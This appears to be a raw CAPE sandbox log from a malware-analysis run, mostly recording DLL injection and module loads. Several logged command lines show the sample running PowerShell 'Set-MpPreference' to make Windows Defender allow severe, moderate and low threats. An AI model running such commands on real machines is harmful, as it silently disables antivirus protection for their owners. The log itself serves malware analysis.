2019-08-13 23:41:19,676 [root] DEBUG: Loader: Injecting process 3000 (thread 1276) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,676 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:19,707 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:19,707 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:19,707 [root] INFO: Announced 64-bit process name: powershell.exe pid: 3132
2019-08-13 23:41:19,723 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 920 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x00000000001F6000-0x0000000000200000
2019-08-13 23:41:19,723 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -SevereThreatDefaultAction 6.
2019-08-13 23:41:19,723 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:19,723 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:19,739 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:19,739 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:19,769 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:19,769 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,769 [root] INFO: Added new process to list with pid: 920
2019-08-13 23:41:19,769 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:19,769 [root] INFO: Monitor successfully loaded in process with pid 920.
2019-08-13 23:41:19,769 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:19,786 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:19,801 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:19,816 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:19,816 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:19,848 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:19,848 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:19,848 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:19,848 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,864 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:19,864 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:19,864 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:19,864 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:19,926 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3000
2019-08-13 23:41:19,926 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:19,926 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:19,926 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:19,926 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:19,926 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:19,926 [root] DEBUG: Loader: Injecting process 3132 (thread 3136) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,926 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:19,941 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:19,957 [root] INFO: Process with pid 2872 has terminated
2019-08-13 23:41:19,957 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:19,957 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:19,957 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:19,957 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:19,957 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:19,957 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:19,973 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:19,973 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:19,973 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:19,973 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:19,973 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:19,973 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:19,987 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:19,987 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:19,987 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:19,987 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:19,987 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:20,019 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:20,035 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:20,035 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:20,051 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:20,051 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:20,051 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:20,051 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:20,051 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:20,065 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:20,065 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:20,065 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\TQQ8PD6SYDSTEQFLYPJ7.temp'
2019-08-13 23:41:20,065 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:20,065 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:20,065 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:20,065 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:20,098 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:20,098 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:20,098 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:20,098 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:20,112 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\TQQ8PD6SYDSTEQFLYPJ7.temp'
2019-08-13 23:41:20,112 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:20,112 [root] INFO: Announced 64-bit process name: cmd.exe pid: 3488
2019-08-13 23:41:20,112 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:20,112 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:20,112 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:20,112 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:20,112 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:20,112 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:20,128 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,128 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:20,128 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:20,128 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3000 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000094000-0x0000000000190000
2019-08-13 23:41:20,128 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:20,128 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\TQQ8PD6SYDSTEQFLYPJ7.temp'
2019-08-13 23:41:20,128 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:20,128 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -ModerateThreatDefaultAction 6.
2019-08-13 23:41:20,144 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:20,144 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3132
2019-08-13 23:41:20,144 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP'
2019-08-13 23:41:20,144 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:20,144 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:20,144 [root] INFO: Added new process to list with pid: 3000
2019-08-13 23:41:20,144 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:20,144 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:20,144 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:20,144 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:20,144 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:20,144 [root] INFO: Monitor successfully loaded in process with pid 3000.
2019-08-13 23:41:20,160 [root] DEBUG: Loader: Injecting process 3488 (thread 3492) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,160 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:20,160 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:20,160 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:20,160 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:20,176 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:20,176 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp" does not exist, skip.
2019-08-13 23:41:20,176 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:20,176 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:20,176 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:20,176 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,190 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:20,190 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:20,207 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:20,207 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:20,207 [root] INFO: Announced 64-bit process name: powershell.exe pid: 3640
2019-08-13 23:41:20,207 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:20,207 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp" does not exist, skip.
2019-08-13 23:41:20,207 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:20,207 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:20,207 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:20,207 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:20,221 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:20,221 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:20,221 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,221 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:20,221 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3132 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000245000-0x0000000000250000
2019-08-13 23:41:20,253 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3488
2019-08-13 23:41:20,269 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:20,269 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:20,269 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -LowThreatDefaultAction 6.
2019-08-13 23:41:20,269 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:20,269 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:20,299 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:20,299 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:20,299 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:20,299 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:20,299 [root] DEBUG: Loader: Injecting process 3640 (thread 3644) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,299 [root] INFO: Added new process to list with pid: 3132
2019-08-13 23:41:20,299 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:20,299 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:20,315 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:20,315 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:20,315 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:20,315 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:20,315 [root] INFO: Monitor successfully loaded in process with pid 3132.
2019-08-13 23:41:20,315 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:20,315 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:20,315 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:20,315 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:20,346 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:20,362 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:20,362 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,378 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:20,378 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:20,378 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:20,378 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:20,378 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:20,394 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:20,394 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:20,394 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:20,410 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:20,410 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:20,410 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:20,410 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:20,487 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:20,487 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:20,487 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:20,487 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:20,533 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:20,549 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:20,549 [root] DEBUG: DLL loaded at 0x000007FEF0C60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 23:41:20,549 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,565 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:20,565 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:20,565 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:20,565 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:20,565 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3640
2019-08-13 23:41:20,565 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:20,581 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:20,581 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:20,581 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:20,581 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3488 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000094000-0x0000000000190000
2019-08-13 23:41:20,581 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:20,581 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:20,581 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
